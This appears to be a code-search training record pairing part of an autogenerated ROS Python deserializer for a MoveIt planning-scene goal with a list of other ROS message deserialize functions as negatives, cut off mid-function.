str[start:end] val1.touch_links.append(val2) _v572 = val1.detach_posture _v573 = _v572.header start = end end += 4 (_v573.seq,) = _get_struct_I().unpack(str[start:end]) _v574 = _v573.stamp _x = _v574 start = end end += 8 (_x.secs, _x.nsecs,) = _get_struct_2I().unpack(str[start:end]) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: _v573.frame_id = str[start:end].decode('utf-8') else: _v573.frame_id = str[start:end] start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) _v572.joint_names = [] for i in range(0, length): start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: val3 = str[start:end].decode('utf-8') else: val3 = str[start:end] _v572.joint_names.append(val3) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) _v572.points = [] for i in range(0, length): val3 = trajectory_msgs.msg.JointTrajectoryPoint() start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) pattern = '<%sd'%length start = end end += struct.calcsize(pattern) val3.positions = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=length) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) pattern = '<%sd'%length start = end end += struct.calcsize(pattern) val3.velocities = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=length) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) pattern = '<%sd'%length start = end end += struct.calcsize(pattern) val3.accelerations = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=length) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) pattern = '<%sd'%length start = end end += struct.calcsize(pattern) val3.effort = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=length) _v575 = val3.time_from_start _x = _v575 start = end end += 8 (_x.secs, _x.nsecs,) = _get_struct_2i().unpack(str[start:end]) _v572.points.append(val3) start = end end += 8 (val1.weight,) = _get_struct_d().unpack(str[start:end]) self.goal.planning_options.planning_scene_diff.robot_state.attached_collision_objects.append(val1) start = end end += 1 (self.goal.planning_options.planning_scene_diff.robot_state.is_diff,) = _get_struct_B().unpack(str[start:end]) self.goal.planning_options.planning_scene_diff.robot_state.is_diff = bool(self.goal.planning_options.planning_scene_diff.robot_state.is_diff) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: self.goal.planning_options.planning_scene_diff.robot_model_name = str[start:end].decode('utf-8') else: self.goal.planning_options.planning_scene_diff.robot_model_name = str[start:end] start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) self.goal.planning_options.planning_scene_diff.fixed_frame_transforms = [] for i in range(0, length): val1 = geometry_msgs.msg.TransformStamped() _v576 = val1.header start = end end += 4 (_v576.seq,) = _get_struct_I().unpack(str[start:end]) _v577 = _v576.stamp _x = _v577 start = end end += 8 (_x.secs, _x.nsecs,) = _get_struct_2I().unpack(str[start:end]) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: _v576.frame_id = str[start:end].decode('utf-8') else: _v576.frame_id = str[start:end] start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: val1.child_frame_id = str[start:end].decode('utf-8') else: val1.child_frame_id = str[start:end] _v578 = val1.transform _v579 = _v578.translation _x = _v579 start = end end += 24 (_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end]) _v580 = _v578.rotation _x = _v580 start = end end += 32 (_x.x, _x.y, _x.z, _x.w,) = _get_struct_4d().unpack(str[start:end]) self.goal.planning_options.planning_scene_diff.fixed_frame_transforms.append(val1) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) self.goal.planning_options.planning_scene_diff.allowed_collision_matrix.entry_names = [] for i in range(0, length): start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: val1 = str[start:end].decode('utf-8') else: val1 = str[start:end] self.goal.planning_options.planning_scene_diff.allowed_collision_matrix.entry_names.append(val1) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) self.goal.planning_options.planning_scene_diff.allowed_collision_matrix.entry_values = [] for i in range(0, length): val1 = moveit_msgs.msg.AllowedCollisionEntry() start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) pattern = '<%sB'%length start = end end += struct.calcsize(pattern) val1.enabled = numpy.frombuffer(str[start:end], dtype=numpy.bool, count=length) val1.enabled = map(bool, val1.enabled) self.goal.planning_options.planning_scene_diff.allowed_collision_matrix.entry_values.append(val1) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) self.goal.planning_options.planning_scene_diff.allowed_collision_matrix.default_entry_names = [] for i in range(0, length): start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: val1 = str[start:end].decode('utf-8') else: val1 = str[start:end] self.goal.planning_options.planning_scene_diff.allowed_collision_matrix.default_entry_names.append(val1) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) pattern = '<%sB'%length start = end end += struct.calcsize(pattern) self.goal.planning_options.planning_scene_diff.allowed_collision_matrix.default_entry_values = numpy.frombuffer(str[start:end], dtype=numpy.bool, count=length) self.goal.planning_options.planning_scene_diff.allowed_collision_matrix.default_entry_values = map(bool, self.goal.planning_options.planning_scene_diff.allowed_collision_matrix.default_entry_values) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) self.goal.planning_options.planning_scene_diff.link_padding = [] for i in range(0, length): val1 = moveit_msgs.msg.LinkPadding() start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: val1.link_name = str[start:end].decode('utf-8') else: val1.link_name = str[start:end] start = end end += 8 (val1.padding,) = _get_struct_d().unpack(str[start:end]) self.goal.planning_options.planning_scene_diff.link_padding.append(val1) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) self.goal.planning_options.planning_scene_diff.link_scale = [] for i in range(0, length): val1 = moveit_msgs.msg.LinkScale() start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: val1.link_name = str[start:end].decode('utf-8') else: val1.link_name = str[start:end] start = end end += 8 (val1.scale,) = _get_struct_d().unpack(str[start:end]) self.goal.planning_options.planning_scene_diff.link_scale.append(val1) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) self.goal.planning_options.planning_scene_diff.object_colors = [] for i in range(0, length): val1 = moveit_msgs.msg.ObjectColor() start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: val1.id = str[start:end].decode('utf-8') else: val1.id = str[start:end] _v581 = val1.color _x = _v581 start = end end += 16 (_x.r, _x.g, _x.b, _x.a,) = _get_struct_4f().unpack(str[start:end]) self.goal.planning_options.planning_scene_diff.object_colors.append(val1) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) self.goal.planning_options.planning_scene_diff.world.collision_objects = [] for i in range(0, length): val1 = moveit_msgs.msg.CollisionObject() _v582 = val1.header start = end end += 4 (_v582.seq,) = _get_struct_I().unpack(str[start:end]) _v583 = _v582.stamp _x = _v583 start = end end += 8 (_x.secs, _x.nsecs,) = _get_struct_2I().unpack(str[start:end]) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: _v582.frame_id = str[start:end].decode('utf-8') else: _v582.frame_id = str[start:end] start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: val1.id = str[start:end].decode('utf-8') else: val1.id = str[start:end] _v584 = val1.type start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: _v584.key = str[start:end].decode('utf-8') else: _v584.key = str[start:end] start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: _v584.db = str[start:end].decode('utf-8') else: _v584.db = str[start:end] start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) val1.primitives = [] for i in range(0, length): val2 = shape_msgs.msg.SolidPrimitive() start = end end += 1 (val2.type,) = _get_struct_B().unpack(str[start:end]) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) pattern = '<%sd'%length start = end end += struct.calcsize(pattern) val2.dimensions = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=length) val1.primitives.append(val2) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) val1.primitive_poses = [] for i in range(0, length): val2 = geometry_msgs.msg.Pose() _v585 = val2.position _x = _v585 start = end end += 24 (_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end]) _v586 = val2.orientation _x = _v586 start = end end += 32 (_x.x, _x.y, _x.z, _x.w,) = _get_struct_4d().unpack(str[start:end]) val1.primitive_poses.append(val2) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) val1.meshes = [] for i in range(0, length): val2 = shape_msgs.msg.Mesh() start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) val2.triangles = [] for i in range(0, length): val3 = shape_msgs.msg.MeshTriangle() start = end end += 12 val3.vertex_indices = numpy.frombuffer(str[start:end], dtype=numpy.uint32, count=3) val2.triangles.append(val3) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) val2.vertices = [] for i in range(0, length): val3 = geometry_msgs.msg.Point() _x = val3 start = end end += 24 (_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end]) val2.vertices.append(val3) val1.meshes.append(val2) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) val1.mesh_poses = [] for i in range(0, length): val2 = geometry_msgs.msg.Pose() _v587 = val2.position _x = _v587 start = end end += 24 (_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end]) _v588 = val2.orientation _x = _v588 start = end end += 32 (_x.x, _x.y, _x.z, _x.w,) = _get_struct_4d().unpack(str[start:end]) val1.mesh_poses.append(val2) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) val1.planes = [] for i in range(0, length): val2 = shape_msgs.msg.Plane() start = end end += 32 val2.coef = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=4) val1.planes.append(val2) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) val1.plane_poses = [] for i in range(0, length): val2 = geometry_msgs.msg.Pose() _v589 = val2.position _x = _v589 start = end end += 24 (_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end]) _v590 = val2.orientation _x = _v590 start = end end += 32 (_x.x, _x.y, _x.z, _x.w,) = _get_struct_4d().unpack(str[start:end]) val1.plane_poses.append(val2) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) val1.subframe_names = [] for i in range(0, length): start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: val2 = str[start:end].decode('utf-8') else: val2 = str[start:end] val1.subframe_names.append(val2) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) val1.subframe_poses = [] for i in range(0, length): val2 = geometry_msgs.msg.Pose() _v591 = val2.position _x = _v591 start = end end += 24 (_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end]) _v592 = val2.orientation _x = _v592 start = end end += 32 (_x.x, _x.y, _x.z, _x.w,) = _get_struct_4d().unpack(str[start:end]) val1.subframe_poses.append(val2) start = end end += 1 (val1.operation,) = _get_struct_b().unpack(str[start:end]) self.goal.planning_options.planning_scene_diff.world.collision_objects.append(val1) _x = self start = end end += 12 (_x.goal.planning_options.planning_scene_diff.world.octomap.header.seq, _x.goal.planning_options.planning_scene_diff.world.octomap.header.stamp.secs, _x.goal.planning_options.planning_scene_diff.world.octomap.header.stamp.nsecs,) = _get_struct_3I().unpack(str[start:end]) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: self.goal.planning_options.planning_scene_diff.world.octomap.header.frame_id = str[start:end].decode('utf-8') else: self.goal.planning_options.planning_scene_diff.world.octomap.header.frame_id = str[start:end] _x = self start = end end += 68 (_x.goal.planning_options.planning_scene_diff.world.octomap.origin.position.x, _x.goal.planning_options.planning_scene_diff.world.octomap.origin.position.y, _x.goal.planning_options.planning_scene_diff.world.octomap.origin.position.z, _x.goal.planning_options.planning_scene_diff.world.octomap.origin.orientation.x, _x.goal.planning_options.planning_scene_diff.world.octomap.origin.orientation.y, _x.goal.planning_options.planning_scene_diff.world.octomap.origin.orientation.z, _x.goal.planning_options.planning_scene_diff.world.octomap.origin.orientation.w, _x.goal.planning_options.planning_scene_diff.world.octomap.octomap.header.seq, _x.goal.planning_options.planning_scene_diff.world.octomap.octomap.header.stamp.secs, _x.goal.planning_options.planning_scene_diff.world.octomap.octomap.header.stamp.nsecs,) = _get_struct_7d3I().unpack(str[start:end]) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: self.goal.planning_options.planning_scene_diff.world.octomap.octomap.header.frame_id = str[start:end].decode('utf-8') else: self.goal.planning_options.planning_scene_diff.world.octomap.octomap.header.frame_id = str[start:end] start = end end += 1 (self.goal.planning_options.planning_scene_diff.world.octomap.octomap.binary,) = _get_struct_B().unpack(str[start:end]) self.goal.planning_options.planning_scene_diff.world.octomap.octomap.binary = bool(self.goal.planning_options.planning_scene_diff.world.octomap.octomap.binary) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: self.goal.planning_options.planning_scene_diff.world.octomap.octomap.id = str[start:end].decode('utf-8') else: self.goal.planning_options.planning_scene_diff.world.octomap.octomap.id = str[start:end] start = end end += 8 (self.goal.planning_options.planning_scene_diff.world.octomap.octomap.resolution,) = _get_struct_d().unpack(str[start:end]) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) pattern = '<%sb'%length start = end end += struct.calcsize(pattern) self.goal.planning_options.planning_scene_diff.world.octomap.octomap.data = numpy.frombuffer(str[start:end], dtype=numpy.int8, count=length) _x = self start = end end += 28 (_x.goal.planning_options.planning_scene_diff.is_diff, _x.goal.planning_options.plan_only, _x.goal.planning_options.look_around, _x.goal.planning_options.look_around_attempts, _x.goal.planning_options.max_safe_execution_cost, _x.goal.planning_options.replan, _x.goal.planning_options.replan_attempts, _x.goal.planning_options.replan_delay,) = _get_struct_3BidBid().unpack(str[start:end]) self.goal.planning_options.planning_scene_diff.is_diff = bool(self.goal.planning_options.planning_scene_diff.is_diff) self.goal.planning_options.plan_only = bool(self.goal.planning_options.plan_only) self.goal.planning_options.look_around = bool(self.goal.planning_options.look_around) self.goal.planning_options.replan = bool(self.goal.planning_options.replan) return self except struct.error as e: raise genpy.DeserializationError(e) #most likely buffer underfill
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def deserialize_numpy(self, str, numpy):\n try:\n end = 0\n _x = self\n start = end\n end += 152\n (_x.tcp, _x.ori, _x.zone, _x.vacuum, _x.workx, _x.worky, _x.workz, _x.workq0, _x.workqx, _x.workqy, _x.workqz, _x.toolx, _x.tooly, _x.toolz, _x.toolq0, _x.toolqx, _x.toolqy, _x.toolqz, _x.ret,) = _struct_2d2q14dq.unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.msg = str[start:end].decode('utf-8')\n else:\n self.msg = str[start:end]\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) #most likely buffer underfill", "def deserialize_numpy(self, str, numpy):\n codecs.lookup_error(\"rosmsg\").msg_type = self._type\n try:\n if self.position is None:\n self.position = geometry_msgs.msg.Point()\n if self.approach is None:\n self.approach = geometry_msgs.msg.Vector3()\n if self.binormal is None:\n self.binormal = geometry_msgs.msg.Vector3()\n if self.axis is None:\n self.axis = geometry_msgs.msg.Vector3()\n if self.width is None:\n self.width = std_msgs.msg.Float32()\n if self.score is None:\n self.score = std_msgs.msg.Float32()\n if self.sample is None:\n self.sample = geometry_msgs.msg.Point()\n end = 0\n _x = self\n start = end\n end += 128\n (_x.position.x, _x.position.y, _x.position.z, _x.approach.x, _x.approach.y, _x.approach.z, _x.binormal.x, _x.binormal.y, _x.binormal.z, _x.axis.x, _x.axis.y, _x.axis.z, _x.width.data, _x.score.data, _x.sample.x, _x.sample.y, _x.sample.z,) = _get_struct_12d2f3d().unpack(str[start:end])\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) # most likely buffer underfill", "def deserialize_numpy(self, str, numpy):\n codecs.lookup_error(\"rosmsg\").msg_type = self._type\n try:\n end = 0\n _x = self\n start = end\n end += 72\n (_x.originId, _x.originType, _x.destinationId, _x.destinationType, _x.range, _x.ts, _x.seq, _x.rxPower, _x.channel, _x.datarate, _x.prf, _x.preambleLength, _x.txGain, _x.angle,) = _get_struct_ihih3i3d2i2d().unpack(str[start:end])\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) # most likely buffer underfill", "def deserialize_numpy(self, str, numpy):\n try:\n if self.header is None:\n self.header = std_msgs.msg.Header()\n end = 0\n _x = self\n start = end\n end += 12\n (_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs,) = _struct_3I.unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.header.frame_id = str[start:end].decode('utf-8')\n else:\n self.header.frame_id = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.cmd = str[start:end].decode('utf-8')\n else:\n self.cmd = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.cat = str[start:end].decode('utf-8')\n else:\n self.cat = str[start:end]\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) #most likely buffer underfill", "def deserialize_numpy(self, str, numpy):\n if python3:\n codecs.lookup_error(\"rosmsg\").msg_type = self._type\n try:\n if self.header is None:\n self.header = std_msgs.msg.Header()\n if self.control is None:\n self.control = vesc_msgs.msg.VescCtrl()\n end = 0\n _x = self\n start = end\n end += 12\n (_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs,) = _get_struct_3I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.header.frame_id = str[start:end].decode('utf-8', 'rosmsg')\n else:\n self.header.frame_id = str[start:end]\n _x = self\n start = end\n end += 56\n (_x.control.mode, _x.control.duty_cycle, _x.control.current, _x.control.brake, _x.control.speed, _x.control.position, _x.control.servo,) = _get_struct_q6d().unpack(str[start:end])\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) # most likely buffer underfill", "def deserialize_numpy(self, str, numpy):\n if python3:\n codecs.lookup_error(\"rosmsg\").msg_type = self._type\n try:\n if self.Header is None:\n self.Header = std_msgs.msg.Header()\n end = 0\n _x = self\n start = end\n end += 12\n (_x.Header.seq, _x.Header.stamp.secs, _x.Header.stamp.nsecs,) = _get_struct_3I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.Header.frame_id = str[start:end].decode('utf-8', 'rosmsg')\n else:\n self.Header.frame_id = str[start:end]\n _x = self\n start = end\n end += 11\n (_x.x_pos, _x.y_pos, _x.angle, _x.code_type, _x.code_num,) = _get_struct_2hHBI().unpack(str[start:end])\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) # most likely buffer underfill", "def deserialize_numpy(self, str, numpy):\n try:\n if self.header is None:\n self.header = std_msgs.msg._Header.Header()\n end = 0\n _x = self\n start = end\n end += 12\n (_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs,) = _struct_3I.unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n self.header.frame_id = str[start:end]\n _x = self\n start = end\n end += 3\n (_x.gear, _x.front_diff, _x.rear_diff,) = _struct_3B.unpack(str[start:end])\n return self\n except struct.error as e:\n raise roslib.message.DeserializationError(e) #most likely buffer underfill", "def deserialize_numpy(self, str, numpy):\n try:\n if self.sv is None:\n self.sv = None\n end = 0\n _x = self\n start = end\n end += 8\n (_x.rcvTOW, _x.week, _x.numSV, _x.reserved1,) = _get_struct_ih2B().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.sv = []\n for i in range(0, length):\n val1 = ublox_msgs.msg.RxmRAW_SV()\n _x = val1\n start = end\n end += 24\n (_x.cpMes, _x.prMes, _x.doMes, _x.sv, _x.mesQI, _x.cno, _x.lli,) = _get_struct_2dfB2bB().unpack(str[start:end])\n self.sv.append(val1)\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) #most likely buffer underfill", "def deserialize_numpy(self, str, numpy):\n try:\n if self.header is None:\n self.header = std_msgs.msg.Header()\n end = 0\n _x = self\n start = end\n end += 12\n (_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs,) = _struct_3I.unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.header.frame_id = str[start:end].decode('utf-8')\n else:\n self.header.frame_id = str[start:end]\n start = end\n end += 4\n (self.battery_voltage,) = _struct_f.unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.flight_mode_ll = str[start:end].decode('utf-8')\n else:\n self.flight_mode_ll = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.state_estimation = str[start:end].decode('utf-8')\n else:\n self.state_estimation = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.position_control = str[start:end].decode('utf-8')\n else:\n self.position_control = str[start:end]\n _x = self\n start = end\n end += 10\n (_x.serial_interface_enabled, _x.serial_interface_active, _x.flight_time, _x.cpu_load,) = _struct_2B2f.unpack(str[start:end])\n self.serial_interface_enabled = bool(self.serial_interface_enabled)\n self.serial_interface_active = bool(self.serial_interface_active)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.motor_status = str[start:end].decode('utf-8')\n else:\n self.motor_status = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.gps_status = str[start:end].decode('utf-8')\n else:\n self.gps_status = str[start:end]\n _x = self\n start = end\n end += 9\n (_x.gps_num_satellites, _x.have_SSDK_parameters, _x.timesync_offset,) = _struct_iBf.unpack(str[start:end])\n self.have_SSDK_parameters = bool(self.have_SSDK_parameters)\n start = end\n end += 16\n self.rc_channel = numpy.frombuffer(str[start:end], dtype=numpy.uint16, count=8)\n start = end\n end += 12\n self.control_axes = numpy.frombuffer(str[start:end], dtype=numpy.uint16, count=6)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%si'%length\n start = end\n end += struct.calcsize(pattern)\n self.control_buttons = numpy.frombuffer(str[start:end], dtype=numpy.int32, count=length)\n _x = self\n start = end\n end += 48\n (_x.latitude, _x.longitude, _x.altitude, _x.pressure_height, _x.velocity_x, _x.velocity_y,) = _struct_6d.unpack(str[start:end])\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) #most likely buffer underfill", "def deserialize_numpy(self, str, numpy):\n codecs.lookup_error(\"rosmsg\").msg_type = self._type\n try:\n if self.header is None:\n self.header = std_msgs.msg.Header()\n end = 0\n _x = self\n start = end\n end += 12\n (_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs,) = _get_struct_3I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.header.frame_id = str[start:end].decode('utf-8', 'rosmsg')\n else:\n self.header.frame_id = str[start:end]\n _x = self\n start = end\n end += 29\n (_x.status, _x.index, _x.range, _x.range_rate, _x.range_accl, _x.azimuth, _x.lateral_rate, _x.width, _x.is_mr_update, _x.is_lr_update, _x.amplitude,) = _get_struct_2B6f2Bb().unpack(str[start:end])\n self.is_mr_update = bool(self.is_mr_update)\n self.is_lr_update = bool(self.is_lr_update)\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) # most likely buffer underfill", "def deserialize_numpy(self, str, numpy):\n try:\n if self.header is None:\n self.header = std_msgs.msg.Header()\n if self.vehicle_id is None:\n self.vehicle_id = opil_v2.msg.Id()\n if self.action_capability is None:\n self.action_capability = None\n end = 0\n _x = self\n start = end\n end += 12\n (_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs,) = _get_struct_3I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.header.frame_id = str[start:end].decode('utf-8')\n else:\n self.header.frame_id = str[start:end]\n start = end\n end += 4\n (self.vehicle_id.id,) = _get_struct_I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.vehicle_id.description = str[start:end].decode('utf-8')\n else:\n self.vehicle_id.description = str[start:end]\n _x = self\n start = end\n end += 84\n (_x.left_size, _x.right_size, _x.front_size, _x.rear_size, _x.min_height, _x.max_height, _x.payload, _x.max_pos_x_vel, _x.max_neg_x_vel, _x.max_pos_x_acc, _x.max_neg_x_acc, _x.max_pos_y_vel, _x.max_neg_y_vel, _x.max_pos_y_acc, _x.max_neg_y_acc, _x.max_pos_ang_vel, _x.max_neg_ang_vel, _x.velocity_control_sensitivity, _x.min_turning_radius, _x.batt_capacity, _x.batt_max_voltage,) = _get_struct_21f().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.vehicle_type = str[start:end].decode('utf-8')\n else:\n self.vehicle_type = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.vendor = str[start:end].decode('utf-8')\n else:\n self.vendor = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.action_capability = []\n for i in range(0, length):\n val1 = opil_v2.msg.RobotAction()\n _x = val1\n start = end\n end += 2\n (_x.category, _x.action,) = _get_struct_2B().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n val1.attributes = []\n for i in range(0, length):\n val2 = opil_v2.msg.Tuple()\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val2.type = str[start:end].decode('utf-8')\n else:\n val2.type = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val2.name = str[start:end].decode('utf-8')\n else:\n val2.name = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val2.value = str[start:end].decode('utf-8')\n else:\n val2.value = str[start:end]\n val1.attributes.append(val2)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1.description = str[start:end].decode('utf-8')\n else:\n val1.description = str[start:end]\n self.action_capability.append(val1)\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) #most likely buffer underfill", "def deserialize_numpy(self, str, numpy):\n try:\n end = 0\n _x = self\n start = end\n end += 36\n (_x.mask, _x.dynModel, _x.fixMode, _x.fixedAlt, _x.fixedAltVar, _x.minElev, _x.drLimit, _x.pDop, _x.tDop, _x.pAcc, _x.tAcc, _x.staticHoldThresh, _x.dgpsTimeOut, _x.reserved2, _x.reserved3, _x.reserved4,) = _get_struct_H2BiIbB4H2B3I().unpack(str[start:end])\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) #most likely buffer underfill", "def deserialize_numpy(self, str, numpy):\n try:\n end = 0\n _x = self\n start = end\n end += 57\n (_x.decision, _x.distance, _x.oriX, _x.oriY, _x.oriZ, _x.placX, _x.placY, _x.placZ,) = _get_struct_b7d().unpack(str[start:end])\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) #most likely buffer underfill", "def deserialize_numpy(self, str, numpy):\n try:\n end = 0\n start = end\n end += 8\n (self.i,) = _struct_d.unpack(str[start:end])\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) #most likely buffer underfill", "def deserialize_numpy(self, str, numpy):\n try:\n if self.icon is None:\n self.icon = rocon_std_msgs.msg.Icon()\n if self.remappings is None:\n self.remappings = None\n if self.pairing is None:\n self.pairing = rocon_interaction_msgs.msg.Pairing()\n end = 0\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.name = str[start:end].decode('utf-8')\n else:\n self.name = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.compatibility = str[start:end].decode('utf-8')\n else:\n self.compatibility = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.display_name = str[start:end].decode('utf-8')\n else:\n self.display_name = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.description = str[start:end].decode('utf-8')\n else:\n self.description = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.namespace = str[start:end].decode('utf-8')\n else:\n self.namespace = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.icon.resource_name = str[start:end].decode('utf-8')\n else:\n self.icon.resource_name = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.icon.format = str[start:end].decode('utf-8')\n else:\n self.icon.format = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n self.icon.data = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.remappings = []\n for i in range(0, length):\n val1 = rocon_std_msgs.msg.Remapping()\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1.remap_from = 